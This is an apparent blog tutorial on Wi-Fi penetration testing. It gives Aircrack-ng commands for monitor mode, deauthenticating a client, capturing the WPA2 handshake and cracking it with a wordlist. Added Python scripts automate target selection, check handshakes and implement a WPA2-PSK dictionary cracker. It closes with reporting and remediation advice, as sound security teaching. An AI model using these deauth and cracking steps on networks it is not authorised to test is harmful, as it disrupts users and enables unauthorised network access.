Saturday, May 21, 2022

How To Make A Wireless Penetration Test


Wi-Fi is a family of wireless networking technologies that uses radio waves to build local network connections without cables. Because the radio signal reaches beyond the walls of a building and Wi-Fi is the standard way of providing network access, attackers frequently choose to penetrate a company by compromising its Wi-Fi network and the infrastructure devices behind it. Homes are also at risk, particularly with the rise of IoT-connected gadgets and appliances.

Wi-Fi penetration testing consists of six main steps: reconnaissance, identifying wireless networks, vulnerability research, exploitation, reporting, and remediation. Such tests are performed to verify the security of a wireless deployment throughout its lifecycle. Configuration mistakes, weak passphrases, and a lack of visibility into wireless attack vectors are the main reasons for carrying one out.

In this article we focus on the Wi-Fi penetration testing steps, the methods, and the most popular tools used in the process.

What Is A Wireless Penetration Test?

Wireless penetration testing involves identifying and examining the connections between all devices attached to the business's Wi-Fi network. These devices include laptops, tablets, smartphones, and any other Internet of Things (IoT) devices.

Wireless penetration tests are typically performed on the client's site, because the tester must be within range of the wireless signal to reach it.

What Are The Goals Of A Wireless Pen Test?

Every formal penetration test should primarily target the vulnerabilities that are easiest to exploit.

This is often referred to as picking the "low-hanging fruit", since these weaknesses represent the highest risk and are the most readily exploitable.

In the case of Wi-Fi networks, these vulnerabilities are most often found in the wireless access points.

One reason for this is a lack of Network Access Control (NAC) and the absence of MAC filtering on the access point.

If such security controls are not used to raise the security of a Wi-Fi network, attackers gain a considerable advantage over the company and can use numerous techniques and Wi-Fi hacking tools to gain unauthorized access to the network.

Steps To Performing A Wireless Penetration Test

As stated earlier, we will concentrate on the methodology and steps for testing a Wi-Fi network and give examples of specific attacks and tools that accomplish each goal.

Wireless Penetration Steps

Below is a list of steps, grouped into the six phases of the penetration test.

Step 1: Wireless Reconnaissance

Before jumping straight into hacking, the first step in every penetration testing methodology is the information gathering phase.

Because of the nature of Wi-Fi, the information you gather here comes from war driving: a reconnaissance technique that consists of moving around the target area to sniff out Wi-Fi signals and record the access points seen, their channels, and their security settings.

To do this you will need the following equipment:

  • A car or any other means of transport.
  • A laptop and an external Wi-Fi antenna.
  • A wireless network adapter that supports monitor mode (and packet injection, for the later steps).
  • Packet capture and analysis software.

Most of the traffic you gather here will be useful but encrypted, since most companies use WPA2 (or, increasingly, WPA3).

WPA2 protects the access point with encryption (CCMP) and uses EAPOL frames, the 4-way handshake, to authenticate the client and derive the session keys.

Step 2: Identify Wireless Networks

The next step in Wi-Fi penetration testing is scanning or identifying wireless networks.

Before this phase, you must put your wireless card into "monitor" mode to enable raw packet capture, specifying your wlan interface:

airmon-ng start wlan0

Once your wireless card is listening to wireless traffic, you can start the scanning process with airodump-ng, which hops across channels and lists the access points and clients it sees:

airodump-ng wlan0mon

An important step in reducing your workload during scanning is to lock airodump-ng to a single channel and a single access point (BSSID) and write the capture to a file; the -w prefix produces dump-01.cap together with a dump-01.csv summary of the access points and stations seen:

airodump-ng -c 11 --bssid 00:01:02:03:04:05 -w dump wlan0mon
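As an added example (not code from the original article), the following Python script parses the dump-01.csv summary that airodump-ng writes alongside the .cap file and selects the targets for the following steps: WPA/WPA2-PSK networks with at least one associated client. Open networks and 802.1X (MGT) or WPA3-SAE networks are left out, because the handshake-capture attack does not apply to them. The CSV text embedded in the block is constructed to match airodump-ng's layout; the BSSID and client MAC are the placeholder addresses used in this article.

```python
import csv
import io

# Constructed sample in the layout of airodump-ng's dump-01.csv (not a real capture); the BSSID and
# client MAC are the placeholder addresses used in this article.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:01:02:03:04:05, 2022-05-21 10:00:01, 2022-05-21 10:05:22,  11,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   9, corp-wifi,
AA:BB:CC:DD:EE:01, 2022-05-21 10:00:03, 2022-05-21 10:05:20,   6,  54, OPN,  ,  , -70,   80,  0,   0.  0.  0.  0,   5, guest,
AA:BB:CC:DD:EE:02, 2022-05-21 10:00:04, 2022-05-21 10:05:21,   1,  54, WPA2, CCMP, MGT, -55,   90,  0,   0.  0.  0.  0,   8, corp-ent,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:04:05:06:07:08, 2022-05-21 10:00:05, 2022-05-21 10:05:20, -50,   33, 00:01:02:03:04:05, corp-wifi
00:04:05:06:07:09, 2022-05-21 10:01:05, 2022-05-21 10:05:10, -60,   12, (not associated), corp-wifi,guest
"""


def parse_airodump_csv(text: str) -> dict:
    """Parse both sections of an airodump-ng CSV into {bssid: {...ap fields..., "clients": [...]}}."""
    aps, stations, section = {}, [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not row[0].strip():
            continue                                   # blank separator line between the sections
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "sta"
            continue
        if section == "ap" and len(row) >= 14:
            aps[row[0]] = {
                "bssid": row[0],
                "channel": int(row[3]),
                "privacy": row[5].strip(),      # OPN, WEP, WPA, WPA2, WPA3, ...
                "cipher": row[6].strip(),
                "auth": row[7].strip(),         # PSK, MGT (802.1X), SAE, ...
                "essid": row[13].strip(),
                "clients": [],
            }
        elif section == "sta" and len(row) >= 6:
            stations.append((row[0], row[5].strip()))
    for sta, bssid in stations:
        if bssid in aps:                        # "(not associated)" stations are skipped
            aps[bssid]["clients"].append(sta)
    return aps


def psk_targets(aps: dict) -> list:
    """Networks the handshake-capture attack applies to: WPA/WPA2 with PSK auth and a client to deauth."""
    return [ap for ap in aps.values()
            if ap["privacy"].startswith("WPA") and ap["auth"] == "PSK" and ap["clients"]]


def attack_commands(ap: dict, iface: str = "wlan0mon") -> list:
    """The two commands from this article, filled in from the parsed data (first client as deauth target)."""
    client = ap["clients"][0]
    return [
        f"airodump-ng -c {ap['channel']} --bssid {ap['bssid']} -w dump {iface}",
        f"aireplay-ng --deauth 5 -a {ap['bssid']} -c {client} {iface}",
    ]


if __name__ == "__main__":
    for target in psk_targets(parse_airodump_csv(SAMPLE_CSV)):
        print(target["essid"], *attack_commands(target), sep="\n  ")
```

Run against a real dump-01.csv, the script prints one block per candidate network with the exact airodump-ng and aireplay-ng invocations for it; a station listed as "(not associated)" is only probing and cannot be deauthenticated into a handshake.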

Step 3: Vulnerability Research

After finding Wi-Fi access points through scanning, the next phase of the test focuses on identifying vulnerabilities in those access points. The most common one lies in the 4-way handshake, the EAPOL exchange between the access point and the authenticating client in which both sides prove they hold the same pairwise master key (PMK) and derive the session keys.

With WPA2-Personal the PMK is derived from the pre-shared passphrase and the SSID (PBKDF2-HMAC-SHA1 with 4096 iterations). The passphrase itself is never transmitted: the handshake carries two random nonces and a message integrity code (MIC) computed with a key that is derived from the PMK, the two nonces and the two MAC addresses.

Everything needed to verify a guess at the passphrase is therefore visible on the air. An attacker who sniffs the handshake can take it offline and try passphrases from a wordlist at leisure, with no further interaction with the access point and no lockout to worry about.

To illustrate this most commonly exploited weakness, the next section of the article focuses on the handshake capture attack and the tools used to carry it out.

Step 4: Exploitation

We will use the Aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng and aircrack-ng) to accomplish our exploitation efforts by:

  • De-authenticating a legitimate client.
  • Capturing the 4-way handshake when the legitimate client reconnects.
  • Running an offline dictionary attack against the captured handshake.

Since we have already started capturing traffic on the target's channel with airodump-ng, we can proceed to the next step.

De-authenticating A Legitimate Client

aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 wlan0mon

This forcibly disconnects the legitimate client from the access point; the airodump-ng capture we started earlier then sniffs the 4-way handshake as the client reconnects automatically. Note that if the network enforces Protected Management Frames (802.11w), unauthenticated deauthentication frames are ignored and you have to wait for a client to connect on its own.

Capturing The Initial Handshake

While airodump-ng keeps capturing after the deauthentication frames have been sent, its live output shows the state of the capture and of the attack.

We can see the channel number, time elapsed, the BSSID (MAC address) of the access point, the number of beacons, the associated stations and much more. Once the handshake has been seen, the top line of the output reads "WPA handshake:" followed by the BSSID.

The time it takes depends on the distance between the tester, the access point and the client being disconnected, and on how quickly that client reconnects.

Because we started airodump-ng with -w dump, the captured traffic is already being written to a ".cap" file (dump-01.cap).

We can open that file in Wireshark, a popular network protocol analyzer, and apply the display filter "eapol" to confirm that all four messages of the handshake were captured.

Once the 4-way handshake is confirmed, stop airodump-ng with Ctrl-C. When you have finished with the wireless interface altogether, take it out of monitor mode with "airmon-ng stop wlan0mon" (this stops monitor mode, not the capture).
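To show what the Wireshark "eapol" check is actually looking at, here is an added Python example (not from the article) that classifies EAPOL-Key frames into the four handshake messages from their Key Information flags and reports whether the capture is sufficient for an offline attack. The frames are constructed inside the block (only the header fields the checks read are filled in) and represent the 802.1X payload, i.e. what follows the 0x888e SNAP header in a captured 802.11 data frame.

```python
import struct

# Key Information flags in the EAPOL-Key descriptor (IEEE 802.11i); bits 0-2 are the descriptor version.
KEY_INFO_PAIRWISE = 1 << 3
KEY_INFO_INSTALL = 1 << 6
KEY_INFO_ACK = 1 << 7
KEY_INFO_MIC = 1 << 8
KEY_INFO_SECURE = 1 << 9


def eapol_key_message(frame: bytes):
    """Return 1..4 for a pairwise 4-way handshake message, or None for anything else.
    `frame` is the 802.1X payload: version(1), type(1), length(2), then the key descriptor."""
    if len(frame) < 95 or frame[1] != 3:          # 802.1X type 3 = EAPOL-Key
        return None
    (key_info,) = struct.unpack(">H", frame[5:7])
    if not key_info & KEY_INFO_PAIRWISE:          # group-key handshake frames are not what we want
        return None
    ack = bool(key_info & KEY_INFO_ACK)
    mic = bool(key_info & KEY_INFO_MIC)
    install = bool(key_info & KEY_INFO_INSTALL)
    secure = bool(key_info & KEY_INFO_SECURE)
    if ack and not mic:
        return 1      # AP -> client: ANonce
    if mic and not ack and not secure:
        return 2      # client -> AP: SNonce + MIC (the frame aircrack-ng needs)
    if ack and mic and install:
        return 3      # AP -> client: ANonce again, encrypted GTK, MIC
    if mic and not ack and secure:
        return 4      # client -> AP: confirmation, MIC
    return None


def replay_counter(frame: bytes) -> int:
    return int.from_bytes(frame[9:17], "big")


def handshake_status(frames) -> dict:
    """Summarize a capture: which messages are present, whether their replay counters belong to one
    handshake (M1/M2 share a counter, M3/M4 share the next one), and whether an offline attack is
    possible, which needs message 2 (SNonce + MIC) plus message 1 or 3 (ANonce)."""
    counters = {}
    for f in frames:
        n = eapol_key_message(f)
        if n is not None and n not in counters:
            counters[n] = replay_counter(f)
    offsets = {1: 0, 2: 0, 3: 1, 4: 1}
    bases = {counters[n] - offsets[n] for n in counters}
    return {
        "messages": sorted(counters),
        "consistent": len(bases) <= 1,
        "crackable": 2 in counters and (1 in counters or 3 in counters),
    }


def _eapol_key(key_info: int, replay: int, nonce: bytes) -> bytes:
    """Constructed test frame: only the fields the checks read are filled; MIC and key data are zero."""
    body = struct.pack(">BHH8s32s", 2, key_info, 16, replay.to_bytes(8, "big"), nonce) + b"\x00" * 50
    return struct.pack(">BBH", 1, 3, len(body)) + body


ANONCE = bytes(range(0x10, 0x30))
SNONCE = bytes(range(0x80, 0xA0))
# Key info values as seen in a typical WPA2-CCMP capture (descriptor version 2).
SAMPLE_HANDSHAKE = [
    _eapol_key(0x008A, 1, ANONCE),      # message 1
    _eapol_key(0x010A, 1, SNONCE),      # message 2
    _eapol_key(0x13CA, 2, ANONCE),      # message 3
    _eapol_key(0x030A, 2, bytes(32)),   # message 4 (nonce field typically zero in WPA2)
]

if __name__ == "__main__":
    print(handshake_status(SAMPLE_HANDSHAKE))
```

The replay-counter check matters in practice: a busy capture can contain message 1 from one connection attempt and message 2 from a later one, and aircrack-ng will then test every candidate against a nonce pair that never belonged together.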

Dictionary Attack On The Captured Key

The final step of the exploitation phase is to crack the captured handshake and recover the passphrase. For this we do not even need a separate password cracker such as John the Ripper or hashcat; aircrack-ng, part of the Aircrack-ng suite, does the job.

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:01:02:03:04:05 dump-01.cap

The -w option points aircrack-ng at the dictionary to use (rockyou.txt ships gzip-compressed with Kali Linux under /usr/share/wordlists; gunzip it first), -b selects the target access point by BSSID, and dump-01.cap is the capture containing the handshake.

The command tries every candidate from the dictionary against the handshake captured from the target access point, deriving the keys for each candidate and comparing the resulting MIC with the one in the capture.

As the end result, we successfully recovered the passphrase "community".
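To make concrete what aircrack-ng does in the step above, and why the passphrase can be recovered offline at all (Step 3), here is an added Python example, not part of the original article, that implements the WPA2-Personal key derivation and MIC check with the standard library only. It builds a handshake message 2 for a constructed network (made-up SSID corp-wifi, the placeholder MAC addresses from this article, fixed nonces, passphrase "community") and then recovers the passphrase from a small wordlist exactly the way a dictionary attack does: PBKDF2 to the PMK, the 802.11i PRF to the PTK, HMAC-SHA1 over the EAPOL frame with the KCK, and a comparison against the captured MIC.

```python
import hashlib
import hmac
import struct

# Constructed demo network: placeholder MACs from the article, fixed nonces, made-up SSID.
SSID = b"corp-wifi"
AP_MAC = bytes.fromhex("000102030405")      # BSSID (the -a / -b address above)
STA_MAC = bytes.fromhex("000405060708")     # client (the -c address above)
ANONCE = bytes(range(0x10, 0x30))           # AP nonce, normally taken from message 1
SNONCE = bytes(range(0x80, 0xA0))           # client nonce, carried in message 2
MIC_OFFSET = 81  # 4-byte 802.1X header + 77 descriptor bytes precede the 16-byte MIC field


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, truncate to 64 bytes."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs) || max(MACs) || min(nonces) || max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(passphrase: str) -> bytes:
    """Build handshake message 2 (client -> AP) the way a legitimate client would, with a valid MIC."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2 CCMP/PSK RSN IE
    descriptor = struct.pack(
        ">BHH8s32s16s8s8s16sH",
        2,                        # descriptor type: RSN
        0x010A,                   # key info: version 2, pairwise, MIC bit set
        16,                       # key length (CCMP)
        (1).to_bytes(8, "big"),   # replay counter
        SNONCE, b"\x00" * 16, b"\x00" * 8, b"\x00" * 8,
        b"\x00" * 16,             # MIC placeholder, filled in below
        len(rsn_ie),
    ) + rsn_ie
    frame = struct.pack(">BBH", 1, 3, len(descriptor)) + descriptor  # 802.1X v1, type EAPOL-Key
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_psk(ssid, ap_mac, sta_mac, anonce, msg2, wordlist):
    """Offline dictionary attack: for each candidate, recompute PMK -> PTK -> KCK and compare the MIC.
    Only the captured handshake is needed; the access point is never contacted again."""
    snonce = msg2[17:49]                       # nonce field: after type(1), key info(2), key len(2), replay(8)
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    captured = build_msg2("community")
    print(crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, captured, ["password", "letmein", "community"]))
```

The cost of the attack is dominated by the 4096-iteration PBKDF2 per candidate, which is why a GPU cracker such as hashcat is used for large wordlists, and why a long random passphrase (or WPA3-SAE, whose handshake does not give the attacker a verifiable MIC to test guesses against) is the remediation that actually works.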

Other Wireless Attacks

Since capturing the 4-way handshake and cracking it offline is one of the most effective ways of gaining unauthorized access, we placed the emphasis on this practical attack.

Other practical attacks on wireless networks include the deployment of a rogue access point within the company.

This attack uses an unauthorized Wi-Fi access point, set up inside the company's buildings, that advertises the same SSID as the legitimate network.

The main idea is to overpower the signal of a legitimate access point in the company's network (or, where the rules of engagement allow it, to knock clients off the legitimate access point with deauthentication frames; radio jammers are illegal in most jurisdictions) and so force employees' devices to connect to the rogue access point.

If this succeeds, the attacker controls all the traffic passing through that access point and can read or modify anything that is not protected by an additional layer such as TLS.

Step 5: Reporting

Structuring all your steps, methods and findings into a comprehensive document is the most important step in a penetration tester's work.

Document every step of your work, including every finding in detail, so that you have all the necessary details to make the report complete.

Make sure to include an executive summary, the detailed technical risks, the vulnerabilities you found along with the complete process of how you found them, the exploits that were successful, and recommendations for mitigation.

Step 6: Remediation And Security Controls

We have demonstrated one practical exploit against wireless networks: capturing the 4-way handshake and recovering the pre-shared key offline. The attack succeeded for several reasons, the decisive one being a weak, dictionary-guessable passphrase; the absence of MAC filtering and network access control made it easier still.

With MAC filtering turned on, the attacker could not simply authenticate from an arbitrary device with the same passphrase the legitimate user used.

Since anything can be bypassed, the attacker would only have to spoof a MAC address that is on the approved list (client MAC addresses are sent in the clear in every 802.11 frame, so the list is easy to harvest from the capture) to break into the wireless network. MAC filtering is therefore a hurdle, not a fix; the controls that actually defeat this attack are a long random passphrase, WPA3-SAE (whose handshake does not allow offline guessing), or WPA2/WPA3-Enterprise with 802.1X per-user credentials.

Network Access Control (NAC) on the wired network, combined with a wireless intrusion detection system that watches for unknown BSSIDs advertising your SSID, will reduce the possibility of rogue access points in your network.

Additionally, a company may consider deploying wireless honeypots: simulated wireless networks used to detect intrusions and analyze the behavior of attackers.


Wi-Fi networks need as much security consideration as the wired network when they are deployed and configured. Wireless penetration testing is therefore a popular way to determine the real security posture of your wireless networks.

Although it requires a little more hardware than the usual penetration test, wireless penetration testing is still carried out with software tools, most of them included in Kali Linux, the best known being the Aircrack-ng suite.

We demonstrated a practical way of using Aircrack-ng and the results it can give with its set of sub-tools. All that is left is to try it yourself (make sure you have written consent for whatever test you intend to do, however small) and fix those vulnerabilities!
